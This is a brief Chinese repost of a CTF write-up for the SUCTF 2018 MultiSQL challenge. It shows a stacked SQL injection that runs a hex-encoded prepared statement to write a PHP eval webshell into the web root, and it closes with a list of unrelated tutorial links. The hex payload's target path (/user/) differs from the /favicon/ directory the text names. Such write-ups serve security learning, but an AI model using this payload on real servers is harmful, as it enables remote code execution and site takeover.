[SUCTF 2018]MultiSQL

本文主要是介绍[SUCTF 2018]MultiSQL，对大家解决编程问题具有一定的参考价值，需要的程序猿们随着小编来一起学习吧！

[SUCTF 2018]MultiSQL

0x01前言

堆叠注入写shell

0x02预编译写shell

需要执行的语句select '<?php @eval($_POST[abc]);?>' into outfile '/var/www/html/favicon/abc.php'

为什么选favicon呢？写题目的时候我也不知道，后来上了shell我才知道，其他目录是没有写权限的

payload=set @a=0x73656C65637420273C3F70687020406576616C28245F504F53545B6162635D293B3F3E2720696E746F206F757466696C6520272F7661722F7777772F68746D6C2F757365722F6162632E70687027;prepare b from @a;execute b;

bp执行记得进行url编码。

flag在根目录

这篇关于[SUCTF 2018]MultiSQL的文章就介绍到这儿，希望我们推荐的文章对大家有所帮助，也希望大家多多支持为之网！

您可能喜欢

Typescript 类型教程：轻松入门与实践指南

11-15
AntDesign-icons项目实战：新手入门教程

11-15
用Scratch编写语言模型：爪爪（Clawed）式简易教程

11-14
用大型语言模型在Amazon Bedrock上分类Jira工单

11-14
从数据到行动：亚马逊Bedrock代理如何自动化复杂工作流

11-14
Databricks与优化后的Snowflake性能大比拼

11-14
亚马逊 Inspector 解析：提升您的 AWS 负载安全的利器

11-14
揭秘VS Code for Web - Azure：轻松开发云端应用的新利器

11-14
揭秘指南：如何让Databricks中的数据为最终用户所用

11-14
OpenTelemetry扩展进入CI/CD可观测性领域

11-14
Fetch / Axios学习：入门教程与实战指南

11-14
Typescript 类型课程入门教程

11-14
Fetch / Axios课程：初学者必看的网络请求教程

11-14
Styled-components课程：初学者指南

11-14
pre-commit 自动化测试课程：入门教程与实践指南

11-13

C/C++教程